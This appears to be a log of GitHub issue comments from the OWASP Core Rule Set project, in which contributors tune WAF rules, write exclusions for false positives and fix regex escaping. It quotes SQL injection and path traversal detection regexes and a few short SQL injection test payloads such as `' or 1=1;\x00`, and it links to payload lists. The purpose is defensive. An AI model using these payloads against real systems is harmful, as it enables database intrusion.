
thanks for your suggest.

I think [this](https://www.netnea.com/cms/apache-tutorial-11_visualizing-log-files/) is a good reference for starting.

Once I read on modsecurity-user-list or any other mailing list about a log parser tool (open source), but now I do not find it.

I think this topic is out of scope of this project, so I'm going to close this issue.

Thanks again.

[2021-08-06 15:51] #2175 closed

[2021-08-06 16:00] RubieV commented on #2175
@Shajin02

I'm a developer for an off-the-shelf product that will give feedback on which rules affect customers, and generates configuration specific to each application.

You can get in touch with me at ruben@securely.ai, so I can get to know more on your specific environment.

[2021-08-14 14:23] posita opened #2176 "Mac ownCloud desktop client and Calendar.app over privacy VPN"
### Description

Originally filed as owncloud/core#39109.

### Audit Logs / Triggered Rule Numbers

[code]

[code]

### Your Environment

* Client(s)
  * Calendar.app (Mac OS)
  * ownCloud desktop client ([latest version](https://github.com/owncloud/client/commit/ea9d50062fe1bda7bd1b96b406519f1b6564662f))
* Server
  * DreamHost (apache, mod_security)

### Confirmation

* [X] I have removed any per

[2021-08-15 12:41] azurit commented on #2176
Sorry for the inconvenience and thank you for reporting.

Have you enabled ownCloud exclusion package in CRS setup?

[2021-08-15 19:08] posita commented on #2176
I'm not sure. How would I know, and how would I enable it if it wasn't already?

[2021-08-16 05:33] azurit commented on #2176
Look into file `crs-setup.conf` and see rule ID `900130`.

[2021-08-16 12:39] dune73 commented on #2118
Could somebody come up with a status update here?

[2021-08-16 12:41] dune73 commented on #2135
Honestly, I do not really know what to do here outside of ignoring the problem. Any ideas?

[2021-08-16 12:45] dune73 commented on #2140
@lifeforms : Do you agree with @RedXanadu's analysis. Time for a PR?

[2021-08-16 12:46] dune73 commented on #2142
Any update here @theMiddleBlue ?

[2021-08-16 12:47] dune73 commented on #2150
OK. Agreed. Than I think a PR should be written. (Sorry for not responding earlier)

[2021-08-16 12:50] NiceYouKnow commented on #2118
My idea is to remove this regularity because it doesn't make sense to me. I don't know what others think. thanks~ ^~^

[2021-08-16 12:50] dune73 commented on #2066
I do not think we can do a reasonable generic rule exclusion here. The `SecRuleUpdateTargetById` examples above will work and people will maybe find their way to this issue and suggestion, but I guess we will have to close this issue without a real solution.

[2021-08-16 13:27] RedXanadu commented on #2066
@dune73 Is there a reason that a rule exclusion file like `REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf` cannot have a corresponding post-CRS rule exclusion file, e.g. `RESPONSE-999.9001-WORDPRESS-EXCLUSION-RULES-AFTER-CRS.conf`?

[2021-08-16 13:30] azurit commented on #2066
Current version of WordPress exclusion package is written for vanilla WordPress, it does not support any plugin of theme.

[2021-08-16 13:41] fzipi commented on #2140
@RedXanadu Will this work for nginx and modsec3, considering https://github.com/SpiderLabs/ModSecurity/issues/2148?

[2021-08-16 13:43] franbuehler commented on #2118
Yes, in my opinion this regex can be removed from the source file and the regex can be regenerated for the rule 942400.
And @theMiddleBlue confirms this too.
Would we like @NiceYouKnow to do a PR here?

[2021-08-16 13:44] dune73 commented on #2066
We've never done an AFTER RE file. Namely because we want to enable / disable RE files based on crs-setup.conf and the `SecRuleUpdateTargetById` directive that people would want to place in such a file can't be skipped.

However, when we think about rule exclusion plugins, where you enable a plugin by placing it / linking it in the right folder, then this could become an option. Actually it's an a

[2021-08-16 13:46] dune73 commented on #2118
Thank you @NiceYouKnow.

A PR sounds like a decent plan, yes.

[2021-08-16 13:46] franbuehler commented on #2135
Yes, this problem may be too rare. We can close this issue here. I just wanted to report the problem but then didn't find the time to resolve it ;-)

[2021-08-16 13:49] NiceYouKnow commented on #2118
@franbuehler, The modified rule should be 942310, not 942400, ^~^~. I'll submit PR later.

[2021-08-16 13:53] Shajin02 opened #2177 "Rule: 920320: False positive 0202"
### Description

`[2021-08-16 13:48:36.179425] [-:error] [client *****] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file " /coreruleset-3.4-dev/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1297"] [id "920320"] [msg "Missing User Agent Header"] [severity "NOTICE"] [ver "OWASP_CRS/3.3.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attac

[2021-08-16 14:36] franbuehler commented on #2177
Hello!

Thanks for your report.
The HTTP request is missing an HTTP request header "User-Agent". This means, the client does not send a user-agent, such as Firefox or Safari for example.
This often happens with illegitimate clients. Check the IP address and decide whether the client is legitimate or not.
If this is a legitimate client, you have two options:
- You can either tell/configure the clie

[2021-08-16 14:45] Shajin02 commented on #2177
Could you please provide more info on the tuning process for my issue?

[2021-08-16 15:07] RedXanadu commented on #2140
@fzipi Ah-hah! I think you may have solved it. Thanks for sharing that issue: I thought I had seen something about Apache escaping posted somewhere, but couldn't find it again :)

Changing the regular expression from its current form:
`(?:^|[\\/])\.\.(?:[\\/]|$)`
to this:
`(?:^|[\\\\/])\.\.(?:[\\\\/]|$)`
works!

Based on the information from https://github.com/SpiderLabs/ModSecurity/issues/2148, I

[2021-08-16 16:49] fzipi commented on #2140
Excellent. If we can have a summary written, I can create a couple of negative/positive tests and run those through our testing process and see if this works for both.

[2021-08-16 18:55] lifeforms commented on #2162
We have discussed the problem.

In general, HTML input needs to be excluded with a custom rule. There is simply too much evilness in it and there’s no way CRS is going to accept it.

We could weaken our defenses a bit, by changing this particular rule, but likely, user input would still hit a lot of other rules. There is no reasonable short-term path that would reach the goal of making CRS work we

[2021-08-16 18:55] #2162 closed

[2021-08-16 19:02] lifeforms commented on #2167
It seems that elementor is trying to PUT to a wp-json url. Elementor is becoming a more and more popular “Site builder” plugin for WordPress that basically allows users to create very good looking complex pages with minimal administrator effort. I would not be against including support for it in the package.

I'm using it ourselves on a few pilot projects now, so I might as well contribute anythin

[2021-08-16 19:03] franbuehler commented on #2177
You can entirely remove the rule 920320 with the following rule placed after the CRS include:
`SecRuleRemoveById 920320`
You can do this if you want to accept requests without a user-agent header.

Or you can partially disable this rule for let's say specific IP addresses with:
SecRule REMOTE_ADDR "@ipMatch 192.168.x.y"
    "phase:1,nolog,pass,id:10000,ctl:ruleRemoveById=920320"
Place this tuning

[2021-08-16 19:03] dune73 commented on #2167
We'd still be interested to get your logs @firasd.

[2021-08-16 19:05] lifeforms commented on #2167
Note to self, this is also one exclusion I needed for Elementor that I want so include:

[code]

[2021-08-16 19:08] lifeforms commented on #2150
Probably `PostgreSQL.*ERROR` matched. Maybe there was some "ERROR" string much further in the post. I guess we could make this rule more tight by requiring a maximum number of characters between Postgres and ERROR.

[2021-08-16 19:08] azurit commented on #2167
I have this one in my collection (but cannot provide example of the request):

[code]

[2021-08-16 19:13] dune73 commented on #2142
Issue chat: We concluded that we will stick to the smaller original RE proposal. We're incorporating a pull request that implements this and will close the issue afterwards. If you insist on the longer list, we need logs to back that up.

[2021-08-16 19:14] lifeforms commented on #2167
@azurit Haha, I also have that too. Although, I just did:
[code]

[2021-08-16 19:26] dune73 commented on #2118
Thank you @NiceYouKnow. I co-assigned the issue to you too.

[2021-08-16 19:27] franbuehler commented on #2139
I will provide a PR.

[2021-08-16 19:36] theseion commented on #2118
I don't agree that we should remove it. We don't know what it does and it is different enough from the rest that it appears to be there on purpose (e.g. not just copy pasta). For example, why does the match require at least one space after the quotes? That seems very specific.

Since we don't know what it does we open us up to an attack. Of course, I'm no SQL expert, it's conceivable that the expr

[2021-08-16 19:39] franbuehler commented on #2135
CRS issue chat meeting: we don't like a chained rule that excludes "ping pong".
In addition, this could potentially open a bypass.
We think we should leave this for quieter times.

[2021-08-16 19:39] #2135 closed

[2021-08-16 20:01] franbuehler commented on #2118
During our monthly issue chat meeting, we decided to first find out the intention behind this rule before removing it.
Could you please wait with your PR @NiceYouKnow?

[2021-08-16 20:03] dune73 commented on #2118
We talked this through in our issue chat. In the end we are not really sure what this part of the regex is all about, but we are not 100% sure it's benign / an error.

So we concluded we are going to ask @theMiddleBlue to take this to twitter and ask if any of the red teamers out there can come up with an example attacking payload that is being matched by the regex in https://regex101.com/r/olcs1Q

[2021-08-16 20:12] lifeforms commented on #2066
So, with our current architecture we can't exlude those fields because ACF sends random parameter names and the ModSecurity engine can't add these before the rules are declared - only after. This is not possible with our current file structure. We are considering a complete revamp of the CRS where regexp'ed exclusions WILL be possible, and we will take this issue into consideration for the next re

[2021-08-16 20:16] dune73 commented on #2066
Following up on this: We will take this issue or the more general problem behind it to our Developer Summit in October where this will be discussed. It's likely to remain open until then.

[2021-08-16 20:32] posita commented on #2176
This is what I found on my hosting provider:

[code]

[2021-08-17 01:13] diegaless commented on #2150
I keep the original post, there is no match with 'ERROR' later on, but the word 'errores' is mentioned later, I don't know if that results in a submatch that breaks the rule.  If I have understood correctly the 'ER' that you expose.  If it is helpful I can provide the text of the original post

[2021-08-17 08:58] #2177 closed

[2021-08-17 11:57] RedXanadu commented on #2118
This is a bit of a guess, but maybe it's helpful…

The oldest comments I could find that are related to this regular expression gave some "Example Payloads Detected" which made use of compound assignment, e.g. `aa" =+ - "0`

That made me wonder if the `=\W` part of the regex was designed to catch `=+` and `=-`. Could it be looking for payloads like `' AND =+ 1`?

[2021-08-17 13:11] theMiddleBlue commented on #2118
https://twitter.com/AndreaTheMiddle/status/1427618583354413076?s=20

[2021-08-17 13:17] NiceYouKnow commented on #2118
I looked up the relevant information and found nothing to match.
https://github.com/payloadbox/sql-injection-payload-list
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/

[2021-08-17 13:26] dune73 commented on #2118
Thank you guys. Retweeted with the coreruleset account. We'll see.

[2021-08-17 15:27] mackov83 commented on #2142
Hi, I am facing a very similar issue as discussed above, however with CRS 3.3.2. In my case the fix didn't work, I end up with a blank page. Browser debug shows: 'Failed to load resource: net::ERR_HTTP2_PROTOCOL_ERROR'

Note: I also spotted that rule 9002830 already exists

``
---iNxqEvMX---H--
ModSecurity: Warning. Matched "Operator `Rx' with parameter `(?i)(?:System\.Data\.OleDb\.OleDbException|

[2021-08-18 19:08] RedXanadu commented on #2140
## Summary

This false negative for rule 930110 only affects Apache: the rule works correctly with nginx. The issue appears to be related to the different ways that Apache and nginx require "\\" (backslash) characters to be represented (as explained in detail [here](https://github.com/SpiderLabs/ModSecurity/issues/2148)).

### Test 1: Using rule 930110 with its current regular expression

The curr

[2021-08-18 19:32] RedXanadu commented on #2140
The regular expression for rule 930110 is actually slightly different in v3.4/dev (it's been split into two halves).

Re-running the above tests to be safe yielded the same results. The same logic still applies: changing `\\` to `\\\\`.

I'll submit a PR for consideration shortly (to amend the regular expression)

[2021-08-18 20:21] fzipi commented on #2140
Once the PR is there, I can help with writing tests for this one.

[2021-08-21 15:31] RedXanadu opened #2179 "Inconsistent representation of the backslash character in search patterns"
### Describe the bug

**In brief**: _Inconsistent representation of the backslash character in search patterns means that some CRS rules behave subtly differently depending on the platform in use._

Following on from #2140, a search of the entire Core Rule Set (`v3.4/dev` branch) has revealed a handful of instances of the pattern `\\` being used to represent a single backslash character.

The patt

[2021-08-22 10:39] franbuehler commented on #2179
Thank you very much for looking for these patterns and for this very clearly structured issue!
If I get it right, `\\\\` would work for both platforms.
So we will have to open a PR that replaces `\\` with `\\\\`?

[2021-08-24 07:30] azurit commented on #2150
@diegaless Can you, please, provide the text of the post? Thank you.

[2021-08-24 09:58] azurit commented on #2142
@mackov83 Change ID to `9002840` here:
`    "id:9002830,\`

[2021-08-24 10:15] Shajin02 commented on #2173
Hi @airween , Could you please provide an alternate solution, that our security team is not accepting that we allow the WAF to work with an single argument, They are expecting that it may affect the WAF. So you have any alternate suggestion on this? Also there is any possibilities that we can check what has been blocked?

[2021-08-24 10:19] Shajin02 opened #2181 "Rule: 942370: False positive 0202 - reopened"
Description
```[2021-08-05 10:19:57.] [-:error] ******* ***** [client ***.**.**.**] ModSecurity: Warning. Pattern match "(?i:[\\"'`](?:\\\\s*?(?:(?:\\\\*.+(?:(?:an|i)d|between|like|x?or|div)\\\\W*?[\\"'`]|(?:between|like|x?or|and|div)\\\\s[^\\\\d]+[\\\\w-]+.*?)\\\\d|[^\\\\w\\\\s?]+\\\\s*?[^\\\\w\\\\s]+\\\\s*?[\\"'`]|[^\\\\w\\\\s]+\\\\s*?[\\\\W\\\\d].*?(?:--|#))|.*?\\\\*\\\\s*?\\\\d)|[()\\\\*<>%+-]

[2021-08-24 10:45] azurit commented on #2181
@Shajin02 To see whole blocked request, please activate audit log in `modsecurity.conf`, see:
[code]

[2021-08-24 11:19] mackov83 commented on #2142
Thanks @azurit, that part I figured out for myself by using a new rule ID which wasn't a duplicate - something which I tested is checked when reloading nginx.

However the recommended fix still triggers the same rules. Below is the code I inserted into REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf

[code]

[2021-08-24 13:43] azurit commented on #2142
Can you try changing phase to 4?

`    phase:4,\`

[2021-08-24 14:09] mackov83 commented on #2142
Before I saw your message, I had changed the rule based on: https://github.com/coreruleset/coreruleset/blob/c6ea99c573564159aa4478d1231fa9534226fd6d/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf

I switched from ```@endsWith``` to ```@rx```. This seemed to work as the page itself loads, however the usual checks performed on this page don't complete.

When I checked the audit log, I was see

[2021-08-24 14:14] Shajin02 opened #2182 "Rule: 942200: False positive 0202"
Error log:
ModSecurity: Warning. Pattern match "(?i:(?:(?:(?:(?:trunc|cre|upd)at|renam)e|(?:inser|selec)t|de(?:lete|sc)|alter|load)\\\\s*?\\\\(\\\\s*?space\\\\s*?\\\\(|,.*?[)\\\\da-f\\"'`][\\"'`](?:[\\"'`].*?[\\"'`]|(?:\\\\r?\\\\n)?\\\\z|[^\\"'`]+)|\\\\Wselect.+\\\\W*?from))" at ARGS:fq. [file "/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "714"] [id "942200"] [msg "Detects MySQL comment

[2021-08-24 14:16] azurit commented on #2142
I don't know your setup but ModSecurity itself is not doing any cacheing.

Please use `@endsWith /wp-admin/site-health.php`, it's sufficient, `@rx` is regexp matching.

[2021-08-24 14:18] azurit commented on #2182
Please do not open new issue for every new message - you can comment the original one.
https://github.com/coreruleset/coreruleset/issues/2181

This is not the log i need, please enable Audit logging - see issue #2181.

Closing.

[2021-08-24 14:18] #2182 closed

[2021-08-24 14:21] Shajin02 commented on #2181
Rule 55c19c8d0e58: SecRule "REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*" "@rx (?i:[\"'`](?:\\s*?(?:(?:\\*.+(?:(?:an|i)d|between|like|x?or|div)\\W*?[\"'`]|(?:between|like|x?or|and|div)\\s[^\\d]+[\\w-]+.*?)\\d|[^\\w\\s?]+\\s*?[^\\w\\s]+\\s*?[\"'`]|[^\\w\\s]+\\s*?[\\W\\d].*?(?:--|#))|.*?\\*\\s*?\\d)|[()\\*<>%+-][\\w-]+[^\\w\\s]+[\"'`][^,]|\\^[\"'`])" "phase:2

[2021-08-24 14:22] Shajin02 commented on #2181
@azurit Please help with the fix for the above debug log

[2021-08-24 14:24] Shajin02 commented on #2181
ID: 942130

Rule 55c19c878210: SecRule "ARGS_NAMES|ARGS|XML:/*" "@rx (?i:[\\s'\"`()]*?\\b([\\d\\w]+)\\b[\\s'\"`()]*?(?:<(?:=(?:[\\s'\"`()]*?(?!\\b\\1\\b)[\\d\\w]+|>[\\s'\"`()]*?(?:\\b\\1\\b))|>?[\\s'\"`()]*?(?!\\b\\1\\b)[\\d\\w]+)|(?:not\\s+(?:regexp|like)|is\\s+not|>=?|!=|\\^)[\\s'\"`()]*?(?!\\b\\1\\b)[\\d\\w]+|(?:(?:sounds\\s+)?like|r(?:egexp|like)|=)[\\s'\"`()]*?(?:\\b\\1\\b)))" "phase:2,log,au

[2021-08-24 14:24] Shajin02 commented on #2181
These above belongs to the same false positives

[2021-08-24 14:29] azurit commented on #2181
You need to activate audit logging, see https://github.com/coreruleset/coreruleset/issues/2181#issuecomment-904530298 .

[2021-08-24 14:39] Shajin02 commented on #2181
Yes I have did and am getting the same error logs as above

[2021-08-24 14:42] Shajin02 commented on #2181
--da8e2425-H--
Message: Warning. Pattern match "(?i:[\"'`](?:\\s*?(?:(?:\\*.+(?:(?:an|i)d|between|like|x?or|div)\\W*?[\"'`]|(?:between|like|x?or
|and|div)\\s[^\\d]+[\\w-]+.*?)\\d|[^\\w\\s?]+\\s*?[^\\w\\s]+\\s*?[\"'`]|[^\\w\\s]+\\s*?[\\W\\d].*?(?:--|#))|.*?\\*\\s*?\\d)|[()\\
*<>%+-][\\w-]+[^\\w\\s]+[\" ..." at ARGS:fq. [file /rules/REQUEST-942-APPLICATION-A
TTACK-SQLI.conf"] [line "994"] [id "94237

[2021-08-24 14:42] Shajin02 commented on #2181
Above is the audit logs
Please have a look

[2021-08-24 15:10] Shajin02 commented on #2181
--da8e2425-A--
[24/Aug/2021:14:17:47 +0000] YST-iyG6qIuap6avN2fa3gAAAAs ********** **.**
--da8e2425-B--
GET url.json?&start-date=1daysAgo&end-date=today&jq=undefined&fq=(siteName:%22TEST-test
21-2-1%22) HTTP/1.1
Host: test.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: X

[2021-08-24 15:27] azurit commented on #2181
Try this exclusion rule, put it into file `REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf`:
[code]

[2021-08-24 15:31] azurit commented on #2142
What about this?
[code]

[2021-08-24 15:31] Shajin02 commented on #2181
Can you help with the logs , may be an explanation what being blocked here and what we are allowing here

[2021-08-24 15:39] azurit commented on #2181
With the rule above, you are disabling rule ID `942370` for GET argument `fq` sent to URI `url.json`.

Rule ID `942370` is only a little part of the SQL injection protection.

[2021-08-24 15:41] Shajin02 commented on #2181
If the url is dynamic , like url/test1-1test.json
url/test2-2test.json, Can you give some suggestion

[2021-08-24 15:42] azurit commented on #2181
Send more examples of URLs.

[2021-08-24 15:45] Shajin02 commented on #2181
/template/mockjson/dashboard/app/APP-sitename.json
/template/mockjson/dashboard/app/APP-SITES-sitename.json
/template/mockjson/dashboard/app/APP-SITEMAP-sitename.json
/template/app/v2.3.0/data/provider/member/TEST-customer/features/APP/

[2021-08-24 16:07] azurit commented on #2181
Are you sure you are getting the same error for all of these URIs? You need to send me precise and correct information, otherwise i cannot help you.

[2021-08-24 16:10] Shajin02 commented on #2181
Yes, For all these am getting the same Rule blocked

[2021-08-24 16:13] azurit commented on #2181
Then i suggest to create two rules:

[code]

[2021-08-24 16:25] azurit commented on #2181
I updated rules to exclude also rule ID 942130.

[2021-08-24 16:33] Shajin02 commented on #2181
Thanks, I will check and get back to you, Please dont close the issue

[2021-08-24 16:46] Shajin02 commented on #2181
SecRule REQUEST_FILENAME "@streq /template/app/v2.3.0/data/provider/tenants/TEST-customer/features/APP/" \
    "id:9999001,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    chain"
    SecRule REQUEST_METHOD "@streq GET" \
        "t:none,\
        ctl:ruleRemoveTargetById=942130;ARGS:fq,\
        ctl:ruleRemoveTargetById=942370;ARGS:fq"

"TEST-customer" in above URL will be dynamic, Can you

[2021-08-24 17:07] Shajin02 commented on #2181
Above fix does not seems to solve the issue, facing the same error

[2021-08-25 06:30] mackov83 commented on #2142
Less errors in the audit log, but still not working. Only triggering 953110 now:

[code]

[2021-08-25 06:39] azurit commented on #2142
Oh, sorry, there's a mistake in the last line:

[code]

[2021-08-25 07:11] azurit commented on #2181
What values can be there? Uppercase letters? Lowercase letters? Digits? ...?

[2021-08-25 07:17] Shajin02 commented on #2181
Yes, It will be in the user perspective as they can have Uppercase letters, Lowercase letters, Digits and special characters as -,_ may be anything

[2021-08-25 07:18] Shajin02 commented on #2181
but as of now we have only TEST-customer and that rule seems not working

[2021-08-25 07:41] azurit commented on #2181
Can you show me logs URI `/template/app/v2.3.0/data/provider/tenants/TEST-customer/features/APP/` ?

[2021-08-25 11:16] mackov83 commented on #2142
Doesn't look to have made any difference:

[code]

[2021-08-25 11:26] azurit commented on #2142
I don't see any other problem in that exclusion rule.

[2021-08-25 11:27] azurit commented on #2142
Can you provide full output from that page?

[2021-08-25 11:34] fzipi commented on #2179
@RedXanadu Thanks for keep looking at this :)

I had doubts with 941170. A quick look at https://github.com/hackademix/noscript/blob/8115531e36aadf07de4394ec609f99211f0f2530/src/xss/InjectionChecker.js#L855 reassures me that we should be using `\\\\`, so I'm changing that one.

I don't think we should change 942440, as the regexp there is trying to match `\x00` (null char). What do you think?

[2021-08-25 11:35] mackov83 commented on #2142
[modsec_audit.log](https://github.com/coreruleset/coreruleset/files/7046603/modsec_audit.log)

[2021-08-25 11:46] azurit commented on #2142
Works ok for me (but i'm testing on Apache), please recheck you installed my exclusion rule correctly.

[2021-08-25 11:46] fzipi commented on #2179
Additionally, rule 953100 uses `pmFromFile` instead of pcre regex matching, so it should not be parsed with the exact same parser, and we should leave it as it.

[2021-08-25 12:14] dune73 commented on #2170
I have another report with the following payload that goes undetected in default install:

[code]

Adding REQUEST_FILENAME to 941100 or 941101 (PL2) does the trick.

[2021-08-25 13:53] mackov83 commented on #2142
Ok, I got it working with the following:

[code]

[2021-08-25 13:56] azurit commented on #2142
Do you mean by reordering actions?

[2021-08-25 14:09] mackov83 commented on #2142
To be honest I am not 100% sure.

When I read your message about rechecking the rule, I reordered things (ver: at the end) to ensure that all the syntax was in the correct place which worked.

I have now retested with ctl lines last which also worked. I have a feeling I might not have reloaded Nginx after making the change first time around.

[2021-08-25 14:29] Shajin02 commented on #2181
[2021-08-05 10:19:57.] [-:error] ******* ***** [client ***.**.**.**] ModSecurity: Warning. Pattern match "(?i:[\\"'`](?:\\\\s*?(?:(?:\\\\*.+(?:(?:an|i)d|between|like|x?or|div)\\\\W*?[\\"'`]|(?:between|like|x?or|and|div)\\\\s[^\\\\d]+[\\\\w-]+.*?)\\\\d|[^\\\\w\\\\s?]+\\\\s*?[^\\\\w\\\\s]+\\\\s*?[\\"'`]|[^\\\\w\\\\s]+\\\\s*?[\\\\W\\\\d].*?(?:--|#))|.*?\\\\*\\\\s*?\\\\d)|[()\\\\*<>%+-][\\\\w-]+[^\\\\

[2021-08-25 14:30] Shajin02 commented on #2181
Above mentioned URL was with this audit logs

[2021-08-25 15:08] azurit commented on #2181
This isn't a log for that URI: `[uri /"]`

[2021-08-25 15:21] Shajin02 commented on #2181
Yes, Correct,

[2021-08-29 12:42] fzipi commented on #2034
Hey @lifeforms , I've been playing a bit with this.

Take a look at https://github.com/fzipi/coreruleset/releases.

There you have some of the options that can be done automatically. My conclusion is that, unless we create a github action ourselves, the ones have limited support. In summary:

- a body can be added to the release, so the text reflects what can be expected from it (e.g. in Nightly R

[2021-08-30 03:58] Kendokai commented on #2171
I also got false positive with khmer unicode UTF8: ើ (%E1%9E%BE).

[2021-08-30 09:06] dune73 opened #2185 "Monthly Chat Agenda September 2021 (2021-09-06 and 2021-09-20) False Positive Meeting Agenda"
This is the Agenda for the Monthly CRS Chat.

The general chat is going to happen on https://owasp.slack.com in the channel #coreruleset on Monday, 2021-09-06, at 20:30 CET. That's the 1st Monday of the month. A separate issue chat is happening at the same location, same time on Monday, 2021-09-20. That's the 3rd Monday of the month. Please note that we have a [CRS calendar](https://calendar.googl

[2021-08-30 09:07] #2169 closed

[2021-08-30 10:54] Shajin02 commented on #2181
@azurit , You fix seems to have an typo that there is an gap between ^ and URL, So I had fixed that. Could you please help with  how we can write rules for the dynamic values in the url.

/template/app/v2.3.0/data/provider/tenants/TEST-customer/features/APP

So in the above, the "TEST-customer" should be dynamic and it can be of any name, numbers , and characters that the user selects and we dont

[2021-08-30 11:10] azurit commented on #2181
Probably some issues with copy-pasting, i don't see it there.

Try this:
`SecRule REQUEST_FILENAME "@rx ^/template/app/v2\.3\.0/data/provider/tenants/[^\/]+/features/APP/$" \`

[2021-08-30 20:42] RedXanadu commented on #2179
I've re-tested rule 942440, using the payload `' or 1=1;\x00` which should be caught (it is listed in the comments as an example payload).

---

**Test command:**
[code]

**Test against modsec2-apache:**

Rule 942440 is not triggered, which I believe is a false negative

**Test against modsec3-nginx:**

Rule 942440 is triggered:

[code]

---

I believe that rule 942440 is an instance where it is p

[2021-08-30 21:24] fzipi commented on #2179
Even if I disagree, nothing beats good tests. I think you are right, and we should fix this one.

[2021-08-31 11:21] Shajin02 commented on #2181
ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/coreruleset-3.4-dev/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1297"] [id "920320"] [msg "Missing User Agent Header"] [severity "NOTICE"] [ver "OWASP_CRS/3.3.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/6.5.1

[2021-08-31 13:32] azurit commented on #2181
Add `User-Agent` header to the request.

[2021-08-31 15:44] Shajin02 commented on #2181
942150 "Matched Data: cos( found within ARGS:q: cos(accckt)"
942410 "Matched Data: cos( found within ARGS:q: cos(accckt)"
942200 "Matched Data: ,accCktName:\\x22TEST-YAN21-2-1,APP-Internet12\\x22
942100 Matched Data: f(n) found within ARGS:q: cos(accckt)

Could you please suggest how can we add the exact argument for the fixes? like adding cos(accckt) to the exceptions

[2021-08-31 18:41] azurit commented on #2181
Like this:
`ctl:ruleRemoveTargetById=<rule_id>;ARGS:<GET_or_POST_argument_name>,\
`

[2021-08-31 19:37] RedXanadu commented on #2179
@fzipi Thinking about it some more… do you think rule 942440 is designed to look for a _literal_ null character, or is it looking for the string `\x00`?
I think that makes a difference

[2021-08-31 19:54] fzipi commented on #2179
Should be looking at NUL, right?

[2021-08-31 19:59] fzipi commented on #2179
Looking at history, this might be the reference: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/modsecurity-sql-injection-challenge-lessons-learned/

[2021-09-01 05:49] Shajin02 commented on #2181
`ctl:ruleRemoveTargetById=<rule_id>;ARGS:q: cos(accckt),\`

Is that something we can add like this, Like we need to add the specific argument of q here?

[2021-09-01 07:41] azurit commented on #2181
Yes, you can do it like this (but i need to see full logs to answer you 100% correctly!!!):

[code]

You should combine it with URI like with previous rules.

[2021-09-01 08:09] Shajin02 commented on #2181
`ModSecurity: Warning. Pattern match "(?i:(?:(?:(?:(?:trunc|cre|upd)at|renam)e|(?:inser|selec)t|de(?:lete|sc)|alter|load)\\\\s*?\\\\(\\\\s*?space\\\\s*?\\\\(|,.*?[)\\\\da-f\\"'`][\\"'`](?:[\\"'`].*?[\\"'`]|(?:\\\\r?\\\\n)?\\\\z|[^\\"'`]+)|\\\\Wselect.+\\\\W*?from))" at ARGS:fq. [file "/coreruleset-3.4-dev/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "714"] [id "942200"] [msg "Detects MyS

[2021-09-01 08:11] Shajin02 commented on #2181
Already I have written this fix, So I need to configure as below?

SecRule REQUEST_FILENAME "@Streq /template/app/v2.3.0/data/provider/tenants/TEST-customer/features/APP/"
"id:9999001,
phase:1,
pass,
t:none,
nolog,
chain"
SecRule REQUEST_METHOD "@Streq GET"
"t:none,
ctl:ruleRemoveTargetById=942130;ARGS:fq, \
ctl:ruleRemoveTargetById=942370;ARGS:fq"

SecRule ARGS:q "@streq cos(accckt)" \
    "id:99

[2021-09-01 08:24] Shajin02 commented on #2181
Also like to know what has been exactly blocked by WAF here

[2021-09-01 12:31] fzipi commented on #2170
@dune73 What path should we follow then? @lifeforms?

[2021-09-01 12:40] Shajin02 commented on #2181
It for sample purpose I had written this, The primary requirement is to allow the argument "q" with "cos" as you can see in the logs. Please help with the syntax for last line to add the argument values

SecRule REQUEST_FILENAME "@Streq /template/app/v2.3.0/data/provider/tenants/TEST-customer/features/APP/"
"id:9999001,
phase:1,
pass,
t:none,
nolog,
chain"
SecRule REQUEST_METHOD "@Streq GET"
"t:no

[2021-09-01 12:55] azurit commented on #2181
[code]

[2021-09-01 13:00] Shajin02 commented on #2181
[code]

Please suggest the solution for the above

[2021-09-01 13:08] fzipi commented on #2181
Hi @Shajin02,

The solution is similar to the the ones we mentioned.

As this is not a false positive with CRS, but with your specific usage, I suggest you to read a bit more on how to create exceptions for your case.

You can find plenty of excellent tutorials at https://www.netnea.com/cms/apache-tutorials/.

[2021-09-01 13:31] Shajin02 commented on #2181
Yeah, I agree, But the below once have issues with ">" "\\" , How it can be done?

[code]

[2021-09-01 13:56] fzipi360 commented on #2181
You just exclude the `ARGS:fq`, for al the matching ids 🤷

[2021-09-01 13:56] fzipi commented on #2181
Just exclude the `ARGS:fq` for all the matching ids 🤷

[2021-09-01 14:01] Shajin02 commented on #2181
Yes, But my requirement is like below,

[code]
So cos, User keywords would be fine, but when i need to write above three cases (https://github.com/coreruleset/coreruleset/issues/2181#issuecomment-910288781) how can we write and is this is possible to write with "/""<"?

[code]

[2021-09-01 15:39] fzipi commented on #2181
Per https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual-%28v2.x%29#contains, you only need a string. If you add a string, it should work.

Let me be honest with you: this looks very much like a case that you need to read more documentation. 😄

This is not a problem with CRS, just a problem with your particular install/usage.

If you need additional help (e.g. "I don't know how to write

[2021-09-01 15:39] #2181 closed

[2021-09-01 17:02] RedXanadu commented on #2179
Okay, now I understand what you mean :)

I agree with you: adding `[\\\\]` is incorrect. I originally thought the rule was looking for the string representation `\x00` and not a real NUL byte.

---

If the rule is looking for a NUL byte, should the end of the pattern be: `…|;?\x00)` ?

I've tested how the pattern from rule 942440 is interpreted using the tools `pcre4msc2` and `pcre4msc3`, and beca

[2021-09-01 17:12] fzipi commented on #2179
You can always send a null byte encoded as `%00` I guess...

[2021-09-02 09:11] dune73 opened #2187 "Prepare canned responses for dev-on-duty"
